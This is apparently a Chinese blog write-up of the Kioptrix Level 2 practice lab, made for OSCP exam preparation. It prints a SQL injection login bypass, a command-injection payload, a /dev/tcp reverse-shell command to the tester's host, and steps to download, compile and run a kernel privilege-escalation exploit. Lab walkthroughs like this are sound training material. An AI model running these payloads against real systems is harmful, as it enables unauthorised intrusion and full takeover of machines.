OSCP备战-kioptrix level _2详细分析

已于 2025-05-08 21:23:19 修改
阅读量240 收藏 1
点赞数 10
CC 4.0 BY-SA版权
分类专栏: 靶场 文章标签: web安全 安全
于 2025-05-08 20:25:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_81864699/article/details/147803856

为什么审核一直不通过啊,这是靶机练习啊,为什么为什么为什么

探测目标IP

arp-scan -l


得出目标IP:192.168.155.164
也可以使用

netdiscover -i eth0 -r 192.168.155.0/24

端口扫描

nmap -sV -sT --min-rate 1000 -p1-65535 IP


结果如下:

└─$ nmap -sV -sT --min-rate 1000  -p1-65535 192.168.155.164
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-06 20:55 EDT
Nmap scan report for 192.168.155.164
Host is up (0.0034s latency).
Not shown: 65528 closed tcp ports (conn-refused)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind  2 (RPC #100000)
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
631/tcp  open  ipp      CUPS 1.1
738/tcp  open  status   1 (RPC #100024)
3306/tcp open  mysql    MySQL (unauthorized)


80端口

访问一下,开局一个登录框


拿dirsearch 扫一下看看

dirsearch -u http://192.168.155.164 -e *


访问http://192.168.155.164/manual/index.html
apache页面,好像用处不大
回到登录框
端口开启有3306数据库
尝试SQL:
 

admin' or 1=1 #


进入后台,好像又空白了,但是网站嘛,查看源码一下


发现被注释掉的一部分源码
要恢复页面,bp抓返回包,去掉引号再放开,发现页面恢复正常了


网站执行Ping命令,很容易想到代码执行漏洞
试试看:

192.168.155.142;ls


回显显示出结果:index.php、pingit.php

kali开启监听:

nc -lvvp 9001


反弹shell:

192.168.155.142;sh -i >& /dev/tcp/192.168.155.142/9001 0>&1


查看kali,有结果了


查看id,显示:

uid=48(apache) gid=48(apache) groups=48(apache)


普通用户需要提权
查看系统版本:

uname -a


显示:

Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux


查看详细的发行版系统版本信息:

cat /etc/*-release


查找版本漏洞:
 

searchsploit linux 2.6 centos 4.5


下载:

searchsploit -m 9542.c 


查看要求:

vim 9542.c 


因为要求将Poc下载到靶机里,我们通过反弹的shell实现
上kali机去开启一下服务:

python -m http.server 80


回到连接靶机,下载脚本:

cd /tmp
wget http://192.168.155.142/9542.c
ls


编译文件:

gcc 9542.c -o exploit
./exploit
whoami


权限是root了,大功告成

 

渗透测试靶机---Kioptrix Level 2
久恙502的博客
07-19 324
渗透测试,打靶经历记录,大佬多多指点,谢谢!!
Vulnhub系列-Kioptrix-Level-2
Yasso的博客
12-18 717
靶机: 192.168.249.130 kali: 192.168.249.129 一、信息收集 arp-scan -l nmap -sV 192.168.249.130—查看开放端口 ----访问下80端口---- 发现是个登录框先试试万能密码 username:admin' or 1=1# password:123(任意密码) 发现可以登陆,即存在sql注入 二、0x00漏洞利用(sql注入) sqlmap跑一下数据 登陆框抓包,因为sql注入在username处,在username处标记(减少测试时
VulnHub——Kioptrix Level 2
江左盟的博客
04-21 1334
简介 信息收集 使用fping -agq 192.168.0.0/24探测局域网内其它主机,发现目标主机IP地址,如图: 然后使用nmap --min-rate 10000 -T5 -A -sC -p1-65535 192.168.0.129快速扫描目标主机开启的端口与服务,发现开启22,80,111,443,631,660和3306端口, 使用SearchSploit搜...
Kioptrix_level_2 新手入门攻略
qq_58683895的博客
09-16 312
使用命令注入及漏洞提权攻略靶机,过程较为完整
Kioptrix: Level 2靶机实战 sql注入万能密码到后台 命令执行;getshell 内核漏洞9542 提权
YouthBelief的博客
11-24 1466
Kioptrix: Level 1靶机实战前言0x01 信息收集1.1 探测靶机ip1.2 nmap探测端口0x02 漏洞探测2.1 访问首页 80端口2.1.1远程系统管理员登录界面2.1.1.1 尝试万能密码2.1.1.2 sqlmap2.1.2 命令执行漏洞利用0x03提权3.1查看当前权限3.2内核漏洞提权3.2.1 查看操作系统版本和内核版本3.2.2 找版本漏洞3.2.3上传到靶机中3.2.4 编译运行0x04 总结 前言 Kioptrix: Level 2 (#1): 靶机地址 https:
Kioptrix Level 2 靶机wp
m0_52496313的博客
08-12 965
Kioptrix Level 2靶机wp
Oscp备考-Kioptrix 1】
weixin_44126257的博客
09-13 1777
Oscp备考
Oscp备考-Kioptrix2
weixin_44126257的博客
09-16 2102
Oscp备考:Kioptrix Level 2
Oscp备考-Kioptrix4
weixin_44126257的博客
02-28 392
Oscp备考-Kioptrix4
vulhub - Kioptrix: Level 1.1 (#2) writeup
Jiajiajiang_的博客
12-12 851
主机来源:www.vulnhub.com 下载地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar 发现IP 安装成功后,查找此虚拟机的IP,我使用的是netdiscover netdiscover -i eth0 -r 172.21.137.0/24 找到IP为:172.21.137.47 端口...
1-OSCP自学笔记-October靶机练习1
08-04
OSCP自学笔记-October靶机练习1】这篇教程主要介绍了如何通过渗透测试技术攻破一个名为"October"的靶机。靶机来自于Vulnhub平台,作者选择了10台典型的靶机作为OSCP(Offensive Security Certified Professional)...
VulnHub Kioptrix Level 2进行渗透测试的总结与过程
Ba1_Ma0的博客
03-02 1178
Kioptrix_Level_2 主机发现 用netdiscover工具进行内网主机发现。 Netdiscover简介:专用的二层发现工具。拥有主动和被动发现两种方式。 我使用以下命令: netdiscover -i eth0 命令解释: -i:网卡,选择你监控的网卡。比如eth0。 如图: 工具执行后内容: ip192.168.1.104是我主机的ip,只有ip192.168.1.101是未知的主机,所以目标主机ip为192.168.1.101。 扫描/信息搜集 我使用nmap对目标主机扫描,好
Kioptrix Level 2入门级详细教程&小白也能看懂!
jockerboss的博客
02-27 1329
Kioptrix Level 2入门级教程&小白也能看懂!简单易懂
kioptrix-level2 渗透测试
viki101的博客
09-20 575
3306 (3306/tcp open mysql MySQL (unauthorized))端口,可以利用。开启了80(80/tcp open http Apache httpd 2.0.52 ((CentOS))),一个登录框,看见登录框,就想到了弱口令和sql注入,首先用sql注入万能密码来一波。首先它是一个web控制台,可以ping计算机网络,这就想到了远程命令执行漏洞。根据nmap扫描结果显示,可以发现CentOS,其权限为apache,之后尝试反弹shell。
vulnhub之Kioptrix Level 2
li1136594919的博客
06-09 553
靶机的默认网络方式为桥接,而且改为NAT模式后会自动更改,grud模式也进不去,来来回回折腾了两个小时,都还没搞定IP分配的问题,一度想要删掉靶机。
Kioptrix_Level_2 靶机漏洞复现】
mmdlm的博客
09-11 1115
KioptrixLevel2环境中,通过Nmap扫描发现目标主机,利用命令注入和SQL注入漏洞进行渗透,最终实现反弹shell和提权的过程,包括获取系统信息及本地提权漏洞利用。
vuInhub靶场实战系列--Kioptrix Level #2
weixin_45221204的博客
06-09 1024
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文介绍Kioptrix Level #2靶机渗透测试,内容包括主机扫描(nmap\netdiscover)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch)、netcat、反弹shell、脚本利用、linux内核提权等内容。p=49Checksum主机发现目录扫描端口扫描netcat监听反弹shelllinux内核提权。
Kioptrix Level 2
2303_76157831的博客
03-31 179
admin后的 ' 使原来的代码中的单引号进行闭合,再拼接 or '1'='1 达到万能密码的作用,“or”代表只要有一个条件为真整个语句就为真 ,我们在“or”后面构造 '1'='1 ,这样即使我们并不知道账号密码,但是“or”后方的 '1'='1 等式恒成立,(因为我们输入的账号为 admin' 已经提前手动闭合 ,所以,在代码中显示的完整版为 'admin' or '1'='1' )
[root@BTWAF ~]# sudo oscap xccdf eval \ --profile xccdf_org.ssgproject.content_profile_standard \ --report scan_report.html \ /usr/share/xml/scap/ssg/content/ssg-rocky9-ds.xml OpenSCAP Error: Unable to open file: '/usr/share/xml/scap/ssg/content/ssg-rocky9-ds.xml' [/builddir/build/BUILD/openscap-1.3.12/src/source/oscap_source.c:298]
最新发布
08-04
引用[2]则介绍了SSG是SCAP官方提供的SCAP内容,用于实际检查工作。 用户当前的问题仍然是关于OpenSCAP无法打开ssg-rocky9-ds.xml文件的错误,但这次我们有了更多的参考信息。 结合之前的解决方案和新的引用,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值